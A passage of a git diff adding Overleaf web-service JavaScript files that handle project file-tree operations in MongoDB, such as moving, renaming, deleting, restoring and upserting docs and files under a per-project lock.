).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId, + path, + }) + } + // Refresh newFileRef with the version returned from the database + newFileRef = ProjectLocator.findElementByMongoPath(newProject, path.mongo) + return { oldFileRef: fileRef, project, path, newProject, newFileRef } +} + +async function replaceDocWithFile(projectId, docId, fileRef, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { path } = await ProjectLocator.promises.findElement({ + project, + element_id: docId, + type: 'doc', + }) + const folderMongoPath = _getParentMongoPath(path.mongo) + const newProject = await Project.findOneAndUpdate( + { _id: project._id, [folderMongoPath]: { $exists: true } }, + { + $pull: { + [`${folderMongoPath}.docs`]: { _id: docId }, + }, + $push: { + [`${folderMongoPath}.fileRefs`]: fileRef, + }, + $inc: { version: 1 }, + $set: { lastUpdated: new Date(), lastUpdatedBy: userId }, + }, + { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId, + path, + }) + } + return newProject +} + +async function replaceFileWithDoc(projectId, fileId, newDoc, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { path } = await ProjectLocator.promises.findElement({ + project, + element_id: fileId, + type: 'file', + }) + const folderMongoPath = _getParentMongoPath(path.mongo) + const newProject = await Project.findOneAndUpdate( + { _id: project._id, [folderMongoPath]: { $exists: true } }, + { + $pull: { + [`${folderMongoPath}.fileRefs`]: { _id: fileId }, + }, + $push: { + [`${folderMongoPath}.docs`]: newDoc, + }, + $inc: { version: 1 }, + $set: { lastUpdated: new Date(), lastUpdatedBy: userId }, + }, + { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId, + path, + }) + } + return newProject +} + +async function mkdirp(projectId, path, userId, options = {}) { + // defaults to case insensitive paths, use options {exactCaseMatch:true} + // to make matching case-sensitive + const folders = path.split('/').filter(folder => folder.length !== 0) + + const project = + await ProjectGetter.promises.getProjectWithOnlyFolders(projectId) + if (path === '/') { + return { newFolders: [], folder: project.rootFolder[0] } + } + + const newFolders = [] + let builtUpPath = '' + let lastFolder = null + for (const folderName of folders) { + builtUpPath += `/${folderName}` + try { + const { element: foundFolder, folder: parentFolder } = + await ProjectLocator.promises.findElementByPath({ + project, + path: builtUpPath, + exactCaseMatch: options.exactCaseMatch, + }) + lastFolder = foundFolder + lastFolder.parentFolder_id = parentFolder._id + } catch (err) { + // Folder couldn't be found. Create it. + const parentFolderId = lastFolder && lastFolder._id + const { folder: newFolder, parentFolderId: newParentFolderId } = + await addFolder(projectId, parentFolderId, folderName, userId) + newFolder.parentFolder_id = newParentFolderId + lastFolder = newFolder + newFolders.push(newFolder) + } + } + return { folder: lastFolder, newFolders } +} + +async function moveEntity( + projectId, + entityId, + destFolderId, + entityType, + userId +) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { element: entity, path: entityPath } = + await ProjectLocator.promises.findElement({ + project, + element_id: entityId, + type: entityType, + }) + // Prevent top-level docs/files with reserved names (to match v1 behaviour) + if (_blockedFilename(entityPath, entityType)) { + throw new Errors.InvalidNameError('blocked element name') + } + await _checkValidMove(project, entityType, entity, entityPath, destFolderId) + const { docs: oldDocs, files: oldFiles } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + // For safety, insert the entity in the destination + // location first, and then remove the original. If + // there is an error the entity may appear twice. This + // will cause some breakage but is better than being + // lost, which is what happens if this is done in the + // opposite order. + const { result } = await _putElement( + project, + destFolderId, + entity, + entityType, + userId + ) + // Note: putElement always pushes onto the end of an + // array so it will never change an existing mongo + // path. Therefore it is safe to remove an element + // from the project with an existing path after + // calling putElement. But we must be sure that we + // have not moved a folder subfolder of itself (which + // is done by _checkValidMove above) because that + // would lead to it being deleted. + const newProject = await _removeElementFromMongoArray( + projectId, + entityPath.mongo, + entityId, + userId + ) + const { docs: newDocs, files: newFiles } = + ProjectEntityHandler.getAllEntitiesFromProject(newProject) + const startPath = entityPath.fileSystem + const endPath = result.path.fileSystem + const changes = { + oldDocs, + newDocs, + oldFiles, + newFiles, + newProject, + } + // check that no files have been lost (or duplicated) + if ( + oldFiles.length !== newFiles.length || + oldDocs.length !== newDocs.length + ) { + logger.warn( + { + projectId, + oldDocs: oldDocs.length, + newDocs: newDocs.length, + oldFiles: oldFiles.length, + newFiles: newFiles.length, + origProject: project, + newProject, + }, + "project corrupted moving files - shouldn't happen" + ) + throw new Error('unexpected change in project structure') + } + return { project, startPath, endPath, rev: entity.rev, changes } +} + +async function deleteEntity(projectId, entityId, entityType, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { name: true, rootFolder: true, overleaf: true, rootDoc_id: true } + ) + if ( + entityType === 'folder' && + project.rootFolder.some( + rootFolder => rootFolder._id.toString() === entityId.toString() + ) + ) { + throw new Errors.NonDeletableEntityError('cannot delete root folder') + } + + const deleteRootDoc = + project.rootDoc_id && + entityId && + project.rootDoc_id.toString() === entityId.toString() + const { element: entity, path } = await ProjectLocator.promises.findElement({ + project, + element_id: entityId, + type: entityType, + }) + const newProject = await _removeElementFromMongoArray( + projectId, + path.mongo, + entityId, + userId, + deleteRootDoc + ) + return { entity, path, projectBeforeDeletion: project, newProject } +} + +async function renameEntity(projectId, entityId, entityType, newName, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { + element: entity, + path: entPath, + folder: parentFolder, + } = await ProjectLocator.promises.findElement({ + project, + element_id: entityId, + type: entityType, + }) + const startPath = entPath.fileSystem + const endPath = path.join(path.dirname(entPath.fileSystem), newName) + + // Prevent top-level docs/files with reserved names (to match v1 behaviour) + if (_blockedFilename({ fileSystem: endPath }, entityType)) { + throw new Errors.InvalidNameError('blocked element name') + } + + // check if the new name already exists in the current folder + _checkValidElementName(parentFolder, newName) + + const { docs: oldDocs, files: oldFiles } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + + // we need to increment the project version number for any structure change + const newProject = await Project.findOneAndUpdate( + { _id: projectId, [entPath.mongo]: { $exists: true } }, + { + $set: { + [`${entPath.mongo}.name`]: newName, + lastUpdated: new Date(), + lastUpdatedBy: userId, + }, + $inc: { version: 1 }, + }, + { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId, + path: entPath, + }) + } + + const { docs: newDocs, files: newFiles } = + ProjectEntityHandler.getAllEntitiesFromProject(newProject) + return { + project, + startPath, + endPath, + rev: entity.rev, + changes: { oldDocs, newDocs, oldFiles, newFiles, newProject }, + } +} + +async function _insertDeletedFileReference(projectId, fileRef) { + await DeletedFile.create({ + projectId, + _id: fileRef._id, + name: fileRef.name, + linkedFileData: fileRef.linkedFileData, + hash: fileRef.hash, + deletedAt: new Date(), + }) +} + +async function _removeElementFromMongoArray( + modelId, + path, + elementId, + userId, + deleteRootDoc = false +) { + const nonArrayPath = path.slice(0, path.lastIndexOf('.')) + const options = { new: true } + const query = { _id: modelId } + const update = { + $pull: { [nonArrayPath]: { _id: elementId } }, + $inc: { version: 1 }, + $set: { lastUpdated: new Date(), lastUpdatedBy: userId }, + } + if (deleteRootDoc) { + update.$unset = { rootDoc_id: 1 } + } + return Project.findOneAndUpdate(query, update, options).exec() +} + +function _countElements(project) { + function countFolder(folder) { + if (folder == null) { + return 0 + } + + let total = 0 + if (folder.folders) { + total += folder.folders.length + for (const subfolder of iterablePaths(folder, 'folders')) { + total += countFolder(subfolder) + } + } + if (folder.docs) { + total += folder.docs.length + } + if (folder.fileRefs) { + total += folder.fileRefs.length + } + return total + } + + return countFolder(project.rootFolder[0]) +} + +async function _putElement(project, folderId, element, type, userId) { + if (element == null || element._id == null) { + logger.warn( + { projectId: project._id, folderId, element, type }, + 'failed trying to insert element as it was null' + ) + throw new Error('no element passed to be inserted') + } + + const pathSegment = _getMongoPathSegmentFromType(type) + + // original check path.resolve("/", element.name) isnt "/#{element.name}" or element.name.match("/") + // check if name is allowed + if (!SafePath.isCleanFilename(element.name)) { + logger.warn( + { projectId: project._id, folderId, element, type }, + 'failed trying to insert element as name was invalid' + ) + throw new Errors.InvalidNameError('invalid element name') + } + + if (folderId == null) { + folderId = project.rootFolder[0]._id + } + + if (_countElements(project) > Settings.maxEntitiesPerProject) { + logger.warn( + { projectId: project._id }, + 'project too big, stopping insertions' + ) + CooldownManager.putProjectOnCooldown(project._id) + throw new Error('project_has_too_many_files') + } + + const { element: folder, path } = await ProjectLocator.promises.findElement({ + project, + element_id: folderId, + type: 'folder', + }) + const newPath = { + fileSystem: `${path.fileSystem}/${element.name}`, + mongo: path.mongo, + } + // check if the path would be too long + if (!SafePath.isAllowedLength(newPath.fileSystem)) { + throw new Errors.InvalidNameError('path too long') + } + // Prevent top-level docs/files with reserved names (to match v1 behaviour) + if (_blockedFilename(newPath, type)) { + throw new Errors.InvalidNameError('blocked element name') + } + _checkValidElementName(folder, element.name) + element._id = new ObjectId(element._id.toString()) + const mongoPath = `${path.mongo}.${pathSegment}` + const newProject = await Project.findOneAndUpdate( + { _id: project._id, [path.mongo]: { $exists: true } }, + { + $push: { [mongoPath]: element }, + $inc: { version: 1 }, + $set: { lastUpdated: new Date(), lastUpdatedBy: userId }, + }, + { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId: project._id, + path, + }) + } + return { result: { path: newPath }, project: newProject } +} + +function _blockedFilename(entityPath, entityType) { + // check if name would be blocked in v1 + // javascript reserved names are forbidden for docs and files + // at the top-level (but folders with reserved names are allowed). + const isFolder = entityType === 'folder' + const dir = path.dirname(entityPath.fileSystem) + const file = path.basename(entityPath.fileSystem) + const isTopLevel = dir === '/' + if (isTopLevel && !isFolder && SafePath.isBlockedFilename(file)) { + return true + } else { + return false + } +} + +function _getMongoPathSegmentFromType(type) { + const pathSegment = ENTITY_TYPE_TO_MONGO_PATH_SEGMENT[type] + if (pathSegment == null) { + throw new Error(`Unknown entity type: ${type}`) + } + return pathSegment +} + +/** + * Check if the name is already taken by a doc, file or folder. If so, return an + * error "file already exists". + */ +function _checkValidElementName(folder, name) { + if (folder == null) { + return + } + const elements = [] + .concat(folder.docs || []) + .concat(folder.fileRefs || []) + .concat(folder.folders || []) + for (const element of elements) { + if (element.name === name) { + throw new Errors.DuplicateNameError('file already exists') + } + } +} + +function _confirmFolder(project, folderId) { + if (folderId == null) { + return project.rootFolder[0]._id + } else { + return folderId + } +} + +function _checkValidFolderPath(folderPath, destinationFolderPath) { + if (!folderPath.endsWith('/')) { + folderPath += '/' + } + + if (!destinationFolderPath.endsWith('/')) { + destinationFolderPath += '/' + } + + if (destinationFolderPath === folderPath) { + throw new Errors.InvalidNameError('destination folder is the same as me') + } + + if (destinationFolderPath.startsWith(folderPath)) { + throw new Errors.InvalidNameError( + 'destination folder is a child folder of me' + ) + } +} + +async function _checkValidMove( + project, + entityType, + entity, + entityPath, + destFolderId +) { + const { element: destEntity, path: destFolderPath } = + await ProjectLocator.promises.findElement({ + project, + element_id: destFolderId, + type: 'folder', + }) + + // check if there is already a doc/file/folder with the same name + // in the destination folder + _checkValidElementName(destEntity, entity.name) + + // check if the folder being moved is a parent of the destination folder + if (/folder/.test(entityType)) { + _checkValidFolderPath(entityPath.fileSystem, destFolderPath.fileSystem) + } +} + +/** + * Create an initial file tree out of a list of doc and file entries + * + * Each entry specifies a path to the doc or file. Folders are automatically + * created. + * + * @param {ObjectId} projectId - id of the project + * @param {DocEntry[]} docEntries - list of docs to add + * @param {FileEntry[]} fileEntries - list of files to add + * @return {Promise<string>} the project version after the operation + */ +async function createNewFolderStructure(projectId, docEntries, fileEntries) { + try { + const rootFolder = FolderStructureBuilder.buildFolderStructure( + docEntries, + fileEntries + ) + const project = await Project.findOneAndUpdate( + { + _id: projectId, + 'rootFolder.0.folders.0': { $exists: false }, + 'rootFolder.0.docs.0': { $exists: false }, + 'rootFolder.0.files.0': { $exists: false }, + }, + { + $set: { + rootFolder: [rootFolder], + // NOTE: Do not set lastUpdated/lastUpdatedBy here. They are both set when creating the initial record. + // The newly created clsi-cache record uses the lastUpdated timestamp of the initial record. Updating the lastUpdated timestamp here invalidates the cache record. + }, + $inc: { version: 1 }, + }, + { + new: true, + lean: true, + fields: { version: 1 }, + } + ).exec() + if (project == null) { + throw new OError('project not found or folder structure already exists', { + projectId, + }) + } + return project.version + } catch (err) { + throw OError.tag(err, 'failed to create folder structure', { projectId }) + } +} + +/** + * Given a Mongo path to an entity, return the Mongo path to the parent folder + */ +function _getParentMongoPath(mongoPath) { + const segments = mongoPath.split('.') + if (segments.length <= 2) { + throw new Error('Root folder has no parents') + } + return segments.slice(0, -2).join('.') +} diff --git a/services/web/app/src/Features/Project/ProjectEntityRestoreHandler.js b/services/web/app/src/Features/Project/ProjectEntityRestoreHandler.js new file mode 100644 index 0000000..2ab8a23 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEntityRestoreHandler.js @@ -0,0 +1,45 @@ +const { callbackify } = require('util') +const Path = require('path') +const ProjectEntityHandler = require('./ProjectEntityHandler') +const EditorController = require('../Editor/EditorController') + +// generate a new name based on the original, with an optional label. +// e.g. origname-20210101-122345.tex (default) +// origname-restored-20210101-122345.tex (label="restored") +function generateRestoredName(docName, label) { + const formattedTimestamp = new Date() + .toISOString() + .replace('T', '-') + .replace(/[^0-9-]/g, '') + const extension = Path.extname(docName) + const basename = + Path.basename(docName, extension) + (label ? `-${label}` : '') + return `${basename}-${formattedTimestamp}${extension}` +} + +async function restoreDeletedDoc(projectId, docId, docName, userId) { + const deletedDoc = await ProjectEntityHandler.promises.getDoc( + projectId, + docId, + { include_deleted: true } + ) + const deletedDocName = generateRestoredName(docName) + // Create the doc and emit a websocket message. + return await EditorController.promises.addDocWithRanges( + projectId, + null, + `${deletedDocName}`, + deletedDoc.lines, + deletedDoc.ranges, + null, + userId + ) +} + +module.exports = { + restoreDeletedDoc: callbackify(restoreDeletedDoc), + generateRestoredName, + promises: { + restoreDeletedDoc, + }, +} diff --git a/services/web/app/src/Features/Project/ProjectEntityUpdateHandler.js b/services/web/app/src/Features/Project/ProjectEntityUpdateHandler.js new file mode 100644 index 0000000..a3ae3e0 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEntityUpdateHandler.js @@ -0,0 +1,1729 @@ +const _ = require('lodash') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const Path = require('path') +const fs = require('fs') +const { Doc } = require('../../models/Doc') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentUpdaterHandler = require('../../Features/DocumentUpdater/DocumentUpdaterHandler') +const Errors = require('../Errors/Errors') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const LockManager = require('../../infrastructure/LockManager') +const { Project } = require('../../models/Project') +const ProjectEntityHandler = require('./ProjectEntityHandler') +const ProjectGetter = require('./ProjectGetter') +const ProjectLocator = require('./ProjectLocator') +const ProjectOptionsHandler = require('./ProjectOptionsHandler') +const ProjectUpdateHandler = require('./ProjectUpdateHandler') +const ProjectEntityMongoUpdateHandler = require('./ProjectEntityMongoUpdateHandler') +const SafePath = require('./SafePath') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const FileWriter = require('../../infrastructure/FileWriter') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') +const { + callbackifyMultiResult, + callbackify, +} = require('@overleaf/promise-utils') +const { iterablePaths } = require('./IterablePath') + +const LOCK_NAMESPACE = 'sequentialProjectStructureUpdateLock' +const VALID_ROOT_DOC_EXTENSIONS = Settings.validRootDocExtensions +const VALID_ROOT_DOC_REGEXP = new RegExp( + `^\\.(${VALID_ROOT_DOC_EXTENSIONS.join('|')})$`, + 'i' +) + +function wrapWithLock(methodWithoutLock, lockManager = LockManager) { + // This lock is used to make sure that the project structure updates are made + // sequentially. In particular the updates must be made in mongo and sent to + // the doc-updater in the same order. + if (typeof methodWithoutLock === 'function') { + const methodWithLock = async (projectId, ...rest) => { + return lockManager.promises.runWithLock(LOCK_NAMESPACE, projectId, () => + methodWithoutLock(projectId, ...rest) + ) + } + methodWithLock.withoutLock = methodWithoutLock + return methodWithLock + } else { + // handle case with separate setup and locked stages + const mainTask = methodWithoutLock.withLock + const methodWithLock = async (projectId, ...rest) => { + const arg = await methodWithoutLock.beforeLock(projectId, ...rest) + return lockManager.promises.runWithLock(LOCK_NAMESPACE, projectId, () => + mainTask(arg) + ) + } + methodWithLock.withoutLock = async (...args) => { + return await mainTask(await methodWithoutLock.beforeLock(...args)) + } + methodWithLock.beforeLock = methodWithoutLock.beforeLock + methodWithLock.mainTask = methodWithoutLock.withLock + return methodWithLock + } +} + +async function getDocContext(projectId, docId) { + let project + try { + project = await ProjectGetter.promises.getProject(projectId, { + name: true, + rootFolder: true, + }) + } catch (err) { + throw OError.tag(err, 'error fetching project', { + projectId, + }) + } + + if (!project) { + throw new Errors.NotFoundError('project not found') + } + try { + const { path, folder } = await ProjectLocator.promises.findElement({ + project, + element_id: docId, + type: 'docs', + }) + return { + projectName: project.name, + isDeletedDoc: false, + path: path.fileSystem, + folder, + } + } catch (err) { + if (err instanceof Errors.NotFoundError) { + // (Soft-)Deleted docs are removed from the file-tree (rootFolder). + // docstore can tell whether it exists and is (soft)-deleted. + let isDeletedDoc + try { + isDeletedDoc = await DocstoreManager.promises.isDocDeleted( + projectId, + docId + ) + if (!isDeletedDoc) { + // NOTE: This can happen while we delete a doc: + // 1. web will update the projects entry + // 2. web triggers flushes to tpds/doc-updater + // 3. web triggers (soft)-delete in docstore + // Specifically when an update comes in after 1 + // and before 3 completes. + logger.debug( + { projectId, docId }, + 'updating doc that is in process of getting soft-deleted' + ) + } + return { + projectName: project.name, + isDeletedDoc: true, + path: null, + folder: null, + } + } catch (error) { + if (error instanceof Errors.NotFoundError) { + logger.warn( + { projectId, docId }, + 'doc not found while updating doc lines' + ) + throw error + } + throw OError.tag( + error, + 'error checking deletion status with docstore', + { + projectId, + docId, + } + ) + } + } else { + throw OError.tag(err, 'error finding doc in rootFolder', { + docId, + projectId, + }) + } + } +} + +async function updateDocLines( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy +) { + let ctx + try { + ctx = await getDocContext(projectId, docId) + } catch (error) { + if (error instanceof Errors.NotFoundError) { + // Do not allow an update to a doc which has never exist on this project + logger.warn( + { docId, projectId }, + 'project or doc not found while updating doc lines' + ) + } + + throw error + } + const { projectName, isDeletedDoc, path, folder } = ctx + logger.debug({ projectId, docId }, 'telling docstore manager to update doc') + let modified, rev + try { + ;({ modified, rev } = await DocstoreManager.promises.updateDoc( + projectId, + docId, + lines, + version, + ranges + )) + } catch (err) { + throw OError.tag(err, 'error sending doc to docstore', { docId, projectId }) + } + // path will only be present if the doc is not deleted + if (!modified || isDeletedDoc) { + return { rev } + } + // Don't need to block for marking as updated + ProjectUpdateHandler.promises + .markAsUpdated(projectId, lastUpdatedAt, lastUpdatedBy) + .catch(error => { + logger.error({ error }, 'failed to mark project as updated') + }) + await TpdsUpdateSender.promises.addDoc({ + projectId, + path, + docId, + projectName, + rev, + folderId: folder?._id, + }) + return { rev, modified } +} + +async function setRootDoc(projectId, newRootDocID) { + logger.debug({ projectId, rootDocId: newRootDocID }, 'setting root doc') + if (projectId == null || newRootDocID == null) { + throw new Errors.InvalidError('missing arguments (project or doc)') + } + const docPath = + await ProjectEntityHandler.promises.getDocPathByProjectIdAndDocId( + projectId, + newRootDocID + ) + if (ProjectEntityUpdateHandler.isPathValidForRootDoc(docPath)) { + await Project.updateOne( + { _id: projectId }, + { rootDoc_id: newRootDocID } + ).exec() + } else { + throw new Errors.UnsupportedFileTypeError( + 'invalid file extension for root doc' + ) + } +} + +async function unsetRootDoc(projectId) { + logger.debug({ projectId }, 'removing root doc') + await Project.updateOne( + { _id: projectId }, + { $unset: { rootDoc_id: true } } + ).exec() +} + +async function addDoc(projectId, folderId, docName, docLines, userId, source) { + return await ProjectEntityUpdateHandler.promises.addDocWithRanges( + projectId, + folderId, + docName, + docLines, + {}, + userId, + source + ) +} + +const addDocWithRanges = wrapWithLock({ + async beforeLock( + projectId, + folderId, + docName, + docLines, + ranges, + userId, + source + ) { + if (!SafePath.isCleanFilename(docName)) { + throw new Errors.InvalidNameError('invalid element name') + } + // Put doc in docstore first, so that if it errors, we don't have a doc_id in the project + // which hasn't been created in docstore. + const doc = new Doc({ name: docName }) + const { rev } = await DocstoreManager.promises.updateDoc( + projectId.toString(), + doc._id.toString(), + docLines, + 0, + ranges + ) + + doc.rev = rev + return { + projectId, + folderId, + doc, + docName, + docLines, + ranges, + userId, + source, + } + }, + async withLock({ + projectId, + folderId, + doc, + docName, + docLines, + ranges, + userId, + source, + }) { + const { result, project } = + await ProjectEntityUpdateHandler._addDocAndSendToTpds( + projectId, + folderId, + doc, + userId + ) + const docPath = result?.path?.fileSystem + const projectHistoryId = project?.overleaf?.history?.id + const newDocs = [ + { + doc, + path: docPath, + docLines: docLines.join('\n'), + ranges, + }, + ] + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { newDocs, newProject: project }, + source + ) + return { doc, folderId: folderId || project.rootFolder[0]._id } + }, +}) + +const addFile = wrapWithLock({ + async beforeLock( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + source + ) { + if (!SafePath.isCleanFilename(fileName)) { + throw new Errors.InvalidNameError('invalid element name') + } + const { url, fileRef, createdBlob } = + await ProjectEntityUpdateHandler._uploadFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData + ) + + return { + projectId, + folderId, + userId, + fileRef, + fileStoreUrl: url, + createdBlob, + source, + } + }, + async withLock({ + projectId, + folderId, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) { + const { result, project } = + await ProjectEntityUpdateHandler._addFileAndSendToTpds( + projectId, + folderId, + fileRef, + userId + ) + const projectHistoryId = project.overleaf?.history?.id + const newFiles = [ + { + createdBlob, + file: fileRef, + path: result && result.path && result.path.fileSystem, + url: fileStoreUrl, + }, + ] + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { newFiles, newProject: project }, + source + ) + return { fileRef, folderId, createdBlob } + }, +}) + +const upsertDoc = wrapWithLock( + async function (projectId, folderId, docName, docLines, source, userId) { + if (!SafePath.isCleanFilename(docName)) { + throw new Errors.InvalidNameError('invalid element name') + } + let element, folderPath + try { + ;({ element, path: folderPath } = + await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: folderId, + type: 'folder', + })) + } catch (error) { + if (error instanceof Errors.NotFoundError) { + throw new Error('folder_not_found') + } + throw error + } + + if (element == null) { + throw new Error("Couldn't find folder") + } + + const existingDoc = element.docs.find(({ name }) => name === docName) + const existingFile = element.fileRefs.find(({ name }) => name === docName) + if (existingFile) { + const doc = new Doc({ name: docName }) + const filePath = `${folderPath.fileSystem}/${existingFile.name}` + const { rev } = await DocstoreManager.promises.updateDoc( + projectId.toString(), + doc._id.toString(), + docLines, + 0, + {} + ) + + doc.rev = rev + const project = + await ProjectEntityMongoUpdateHandler.promises.replaceFileWithDoc( + projectId, + existingFile._id, + doc, + userId + ) + + await TpdsUpdateSender.promises.addDoc({ + projectId, + docId: doc._id, + path: filePath, + projectName: project.name, + rev: existingFile.rev + 1, + folderId, + }) + + const projectHistoryId = + project.overleaf && + project.overleaf.history && + project.overleaf.history.id + const newDocs = [ + { + doc, + path: filePath, + docLines: docLines.join('\n'), + }, + ] + const oldFiles = [ + { + file: existingFile, + path: filePath, + }, + ] + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { oldFiles, newDocs, newProject: project }, + source + ) + + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + existingFile._id, + 'convertFileToDoc' + ) + return { doc, isNew: true } + } else if (existingDoc) { + const result = await DocumentUpdaterHandler.promises.setDocument( + projectId, + existingDoc._id, + userId, + docLines, + source + ) + logger.debug( + { projectId, docId: existingDoc._id }, + 'notifying users that the document has been updated' + ) + // there is no need to flush the doc to mongo at this point as docupdater + // flushes it as part of setDoc. + // + // combine rev from response with existing doc metadata + return { + doc: { ...existingDoc, ...result }, + isNew: existingDoc == null, + } + } else { + const { doc } = + await ProjectEntityUpdateHandler.promises.addDocWithRanges.withoutLock( + projectId, + folderId, + docName, + docLines, + {}, + userId, + source + ) + + return { doc, isNew: existingDoc == null } + } + } +) + +const appendToDoc = wrapWithLock( + async (projectId, docId, lines, source, userId) => { + const { element } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: docId, + type: 'doc', + }) + + return await DocumentUpdaterHandler.promises.appendToDocument( + projectId, + element._id, + userId, + lines, + source + ) + } +) + +const upsertFile = wrapWithLock({ + async beforeLock( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + source + ) { + if (!SafePath.isCleanFilename(fileName)) { + throw new Errors.InvalidNameError('invalid element name') + } + // create a new file + const fileArgs = { + name: fileName, + linkedFileData, + } + const { url, fileRef, createdBlob } = + await FileStoreHandler.promises.uploadFileFromDisk( + projectId, + fileArgs, + fsPath + ) + + return { + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + fileRef, + fileStoreUrl: url, + createdBlob, + source, + } + }, + async withLock({ + projectId, + folderId, + fileName, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) { + let element + try { + ;({ element } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: folderId, + type: 'folder', + })) + } catch (error) { + if (error instanceof Errors.NotFoundError) { + throw new Error('folder_not_found') + } + throw error + } + + if (element == null) { + throw new Error("Couldn't find folder") + } + const existingFile = element.fileRefs.find(({ name }) => name === fileName) + const existingDoc = element.docs.find(({ name }) => name === fileName) + + if (existingDoc) { + let path + try { + ;({ path } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: existingDoc._id, + type: 'doc', + })) + } catch (err) { + throw new Error("couldn't find existing file") + } + const project = + await ProjectEntityMongoUpdateHandler.promises.replaceDocWithFile( + projectId, + existingDoc._id, + fileRef, + userId + ) + const projectHistoryId = project.overleaf?.history?.id + await TpdsUpdateSender.promises.addFile({ + projectId: project._id, + historyId: projectHistoryId, + fileId: fileRef._id, + hash: fileRef.hash, + path: path.fileSystem, + rev: fileRef.rev, + projectName: project.name, + folderId, + }) + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { + oldDocs: [{ doc: existingDoc, path: path.fileSystem }], + + newFiles: [ + { + createdBlob, + file: fileRef, + path: path.fileSystem, + url: fileStoreUrl, + }, + ], + newProject: project, + }, + source + ) + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + existingDoc._id, + 'convertDocToFile' + ) + return { fileRef, isNew: true, oldFileRef: existingFile } + } else if (existingFile) { + await ProjectEntityUpdateHandler._replaceFile( + projectId, + existingFile._id, + userId, + fileRef, + fileStoreUrl, + folderId, + source, + createdBlob + ) + + return { fileRef, isNew: false, oldFileRef: existingFile } + } else { + // this calls directly into the addFile main task (without the beforeLock part) + await ProjectEntityUpdateHandler.promises.addFile.mainTask({ + projectId, + folderId, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) + + return { + fileRef, + isNew: existingFile == null, + oldFileRef: existingFile, + } + } + }, +}) + +const upsertDocWithPath = wrapWithLock( + async function (projectId, elementPath, docLines, source, userId) { + if (!SafePath.isCleanPath(elementPath)) { + throw new Errors.InvalidNameError('invalid element name') + } + const docName = Path.basename(elementPath) + const folderPath = Path.dirname(elementPath) + const { newFolders, folder } = + await ProjectEntityUpdateHandler.promises.mkdirp.withoutLock( + projectId, + folderPath, + userId + ) + const { isNew, doc } = + await ProjectEntityUpdateHandler.promises.upsertDoc.withoutLock( + projectId, + folder._id, + docName, + docLines, + source, + userId + ) + + return { doc, isNew, newFolders, folder } + } +) + +const upsertFileWithPath = wrapWithLock({ + async beforeLock( + projectId, + elementPath, + fsPath, + linkedFileData, + userId, + source + ) { + if (!SafePath.isCleanPath(elementPath)) { + throw new Errors.InvalidNameError('invalid element name') + } + const fileName = Path.basename(elementPath) + const folderPath = Path.dirname(elementPath) + // create a new file + const fileArgs = { + name: fileName, + linkedFileData, + } + const { + url: fileStoreUrl, + fileRef, + createdBlob, + } = await FileStoreHandler.promises.uploadFileFromDisk( + projectId, + fileArgs, + fsPath + ) + + return { + projectId, + folderPath, + fileName, + fsPath, + linkedFileData, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + } + }, + async withLock({ + projectId, + folderPath, + fileName, + fsPath, + linkedFileData, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) { + const { newFolders, folder } = + await ProjectEntityUpdateHandler.promises.mkdirp.withoutLock( + projectId, + folderPath, + userId + ) + // this calls directly into the upsertFile main task (without the beforeLock part) + const { + fileRef: newFileRef, + isNew, + oldFileRef, + } = await ProjectEntityUpdateHandler.promises.upsertFile.mainTask({ + projectId, + folderId: folder._id, + fileName, + fsPath, + linkedFileData, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) + + return { + fileRef: newFileRef, + isNew, + oldFileRef, + newFolders, + folder, + } + }, +}) + +const deleteEntity = wrapWithLock( + async function (projectId, entityId, entityType, userId, source, callback) { + logger.debug({ entityId, entityType, projectId }, 'deleting project entity') + if (entityType == null) { + logger.warn({ err: 'No entityType set', projectId, entityId }) + throw new Error('No entityType set') + } + entityType = entityType.toLowerCase() + + // Flush the entire project to avoid leaving partially deleted docs in redis. + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + + const { entity, path, projectBeforeDeletion, newProject } = + 